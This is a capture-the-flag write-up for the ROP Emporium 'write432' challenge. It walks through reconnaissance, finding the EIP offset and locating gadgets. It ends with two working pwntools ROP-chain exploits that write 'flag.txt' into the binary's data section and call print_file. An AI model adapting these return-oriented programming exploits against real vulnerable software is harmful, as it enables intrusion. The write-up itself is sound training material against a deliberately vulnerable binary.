write432

Intro

today we are going to be tackling the 4th challenge on ROP Emporium which is a series of challenges to teach ROP Return Oriented Programming

download the x86 zip file and extract it using unzip, you will get 2 files a 32 bit executable and a flag.txt file which will be revealed if you exploit the binary

Basic Executable Reconnaissance

the executable is not stripped which makes reverse engeneering easier because it doesnt hide function names and the executable is dynamically linked so the libc library which contains many external functions like fprintf() are not loaded within the executable but they dynamically linked at the execution time

we have only one security configuration enabled which is NX No-Execute also known as Data Execution Prevention or DEP marks certain areas of the program as not executable, meaning that stored input or data cannot be executed as code. This is significant because it prevents attackers from being able to jump to custom shellcode that they've stored on the stack or in a global variable.

checksec --file=write432 

let's locate strings and functions imported in this binary using rabin2

using ghidra to do more reversing on this binary we find the print_file() function which takes the string "nonexsistent" as argument so our goal is to write the flag.txt string somewhere and call the print_file() function with the argument flag.txt so it can be printed

let's take a look at the sections and their sizes and permissions in order to write our string somewhere there

now we will pick one of this sections that meets those conditions :

• enough size so we can write our string

• the section should be writeable

but even if those conditions are meet there is high possibility if the section we have choosed contains other data this may corrupt the binary so using ghidra let's take a look on the sections and find which sections maybe interesting for our purpose , data section is empty so this makes it a good one to write in it our string flag.txt

Locate EIP Offset

we will use gdb-pwndbg and cyclic from pwntools to generate a pattern and overwrite EIP and then search the pattern that made into EIP to find the offset to the EIP

let's run the program and send this pattern as input, so laaa is the pattern that made it into the EIP

seaching the pattern and the offset is 44

Writing flag.txt in data section

using gdb-pwndbg list all the functions in the binary and we find a function called usefulgadgets

let's disassemble this function

mov DWORD PTR [edi],ebp; ret; => mov ebp into the memory location pointed by the edi register and then return

so the idea here is to find a way to empty the edi register and put the data section address in it and then put the first 4 bytes of the string flag.txt which is flag in the ebp and then use this gadget mov DWORD PTR [edi],ebp; ret; to write "flag" string that is in the ebp in the memory location pointed by the data section address (edi)

lets find the gadget that pops the edi and the ebp using ropper

• pop the edi and put the data section address in it

• pop the ebp and put "flag" inside it

• mov the ebp (flag) to the memory location pointed by the edi (data section)

• and then repeat the same process for writing the last 4 byes ".txt" string

Exploitation

from pwn import *

# Set up pwntools for the correct architecture
exe = './write432'
elf = context.binary = ELF(exe, checksec=False)

io = process(exe)

offset = 44
print_file = 0x080483d0
data_addr = 0x0804a018
move_gadget = 0x08048543 # mov dword ptr [edi], ebp; ret;
pop_edi_ebp = 0x080485aa # pop edi; pop ebp; ret; 

payload = flat(
	asm('nop') * offset,
	pop_edi_ebp, 	# pop the edi and ebp
	data_addr,   	# putting the data section address into the edi
	b"flag",	# putting the "flag" string in the ebp
	move_gadget, 	# move the ebp into the memory location pointed by the edi
	pop_edi_ebp,
	data_addr + 4, 	# because we have writed "flag" in the first 4 bytes
	b".txt",	# putting the ".txt" string in the ebp
	move_gadget, 
	print_file,  	# EIP calling the print_file() function 
	0x0,	     	# return pointer address of the EIP function
	data_addr,	# first argument of the print_file() function
)

write("payload", payload)
io.sendlineafter(b'>', payload)

io.interactive()

let's run the script and BOOM we've got the flag

another exploit using ROP class

from pwn import *

# Set up pwntools for the correct architecture
exe = './write432'
elf = context.binary = ELF(exe, checksec=False)

io = process(exe)

offset = 44
move_gadget = 0x08048543 # mov dword ptr [edi], ebp; ret;
pop_edi_ebp = 0x080485aa # pop edi; pop ebp; ret; 
data_addr = elf.symbols.data_start

rop = ROP(elf)

#write first 4 bytes into the data section
rop.raw([pop_edi_ebp,data_addr,b"flag",move_gadget])
#write second 4 bytes into the data section
rop.raw([pop_edi_ebp,data_addr + 4,b".txt",move_gadget])

rop.print_file(data_addr)

payload = flat(
	asm('nop') * offset,
	rop.chain()
)

write("payload", payload)
io.sendlineafter(b'>', payload)

io.interactive()